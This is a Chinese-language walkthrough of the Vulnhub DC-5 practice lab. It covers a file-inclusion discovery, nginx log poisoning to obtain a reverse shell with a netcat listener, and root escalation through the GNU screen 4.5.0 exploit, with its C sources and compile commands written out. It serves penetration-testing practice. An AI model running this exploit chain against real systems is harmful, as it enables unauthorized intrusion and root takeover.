Vulnhub靶机DC系列-DC5
2021-01-14 12:52:43 Author: www.freebuf.com(查看原文) 阅读量:176 收藏

0x0:靶场介绍

靶场名称: DC: 5

靶场发布时间:2019-4-21

靶场地址:https://www.vulnhub.com/entry/dc-5,314/

靶场描述:

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

But if you're really, really stuck, you can watch this video which shows the first step.

1x0:环境搭建

VMware虚拟机(桥接模式)

2x0:靶机渗透

获取靶机的IP

nmap -sn 192.168.3.0/24

1610593100_5fffb34caed9a4fc787a1.png!small?1610593100217

使用nmap来查看靶机的端口信息和系统信息等等

1610593089_5fffb341150a6c3d80fe0.png!small?1610593088721

首先去查看80端口的web服务

1610593118_5fffb35e8dde1c5c0e8b8.png!small?1610593117999

没有什么明显的信息就 一个留言框,使用dirb扫描一下目录

1610593186_5fffb3a2ae2c4db27175e.png!small?1610593186302

没有扫描到什么有用的页面,一些说明文件尝试也没有

继续尝试留言框

1610596285_5fffbfbd6209ee1124dce.png!small?1610596284857

提交后年份就变了

1610593252_5fffb3e4064a7629d5119.png!small?1610593251446

再一次提交留言 发现这个年份有了新的变化

1610593278_5fffb3fe5ef7cf37f6d5f.png!small?1610593277765

存在文件包含?(我换一个工具去扫描目录查找被包含文件是什么)1610593764_5fffb5e4afcf86a35ce3e.png!small?1610593764068

发现一个新的文件

1610593794_5fffb60281f71d2d529c5.png!small?1610593793932

确定是包含文件,然后去判断参数(file 基本上都是这个) 读取到/etc/passwd

1610593395_5fffb47376c971683a406.png!small?1610593395056

没有什么利用价值,去寻找其他的地方点

1610593894_5fffb666ddc5d43fdb49a.png!small?1610593894510

没有ssh 发现中间件是nginx去看看日志文件

/var/log/nginx/error.log

1610593435_5fffb49b25bd33ef43277.png!small?1610593435103

/var/log/nginx/access.log access.log 没有返回内容

1610593495_5fffb4d7e82fe0c5efc35.png!small?1610593495378

通过写入日志文件php语句 来反弹shell

第一步:写入php参数

1610593703_5fffb5a768fef9f5cd89f.png!small

第二步:判断语句是否写入成功(访问error的日志文件)

1610593739_5fffb5cb4c9c6d2bd52f5.png!small?1610593738919

第三步 反弹shell

1610593937_5fffb6913bf5fdf66a8ca.png!small?1610593936591

攻击机监听4444端口

nc -lvvp 4444

1610593988_5fffb6c41c93cf028a4db.png!small?1610593987587

3x0:提权篇

切换shell

1610594017_5fffb6e12c5cf08c80452.png!small?1610594016520

查看内核信息

1610594040_5fffb6f8c574fe24a7833.png!small?1610594040160

尝试cve-2016-1247

日志文件也是 root权限

1610594124_5fffb74c9284ed5a360ae.png!small?1610594123943

利用失败

1610594162_5fffb7729d09aad9b4e16.png!small?1610594162082

查看root权限的命令

1610594205_5fffb79d36e7ea9e4eb36.png!small?1610594204630

scree-4.5.0 可以使用

1610594235_5fffb7bb4e37a91de3abb.png!small?1610594234715

exp地址:https://www.exploit-db.com/exploits/41154

第一步:创建并编译libhax.c(攻击机编译即可)

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o libhax.so libhax.c

1610594360_5fffb838dec6448a4b810.png!small?1610594360334

报错,但是程序出来了

1610594384_5fffb8501405a418305c2.png!small?1610594383563

第二步:创建rootshell并编译文件(攻击机编译即可)

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

gcc -o rootshell rootshell.c

1610594559_5fffb8ff20bf907b27215.png!small?1610594558548

第三步:修改.sh文件

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
screen -ls # screen itself is setuid,so...
/tmp/rootshell

在保存文件的时候 需要执行运行环境 不然会报错的

1610594822_5fffba06d3fae462aa1fd.png!small?1610594822680

把这三个文件上传到靶机中

直接下载libhax.so (apache服务下载不下来)

1610595286_5fffbbd64916cd34f1672.png!small?1610595285844

使用 python -m http.server port 既可以下载 chmod777 权限后 就获取到root权限

1610596165_5fffbf459988808c9c596.png!small?1610596164968

4x0:flag获取

1610596212_5fffbf74c39cf3032b934.png!small?1610596212232


文章来源: https://www.freebuf.com/articles/web/260796.html
如有侵权请联系:admin#unsafe.sh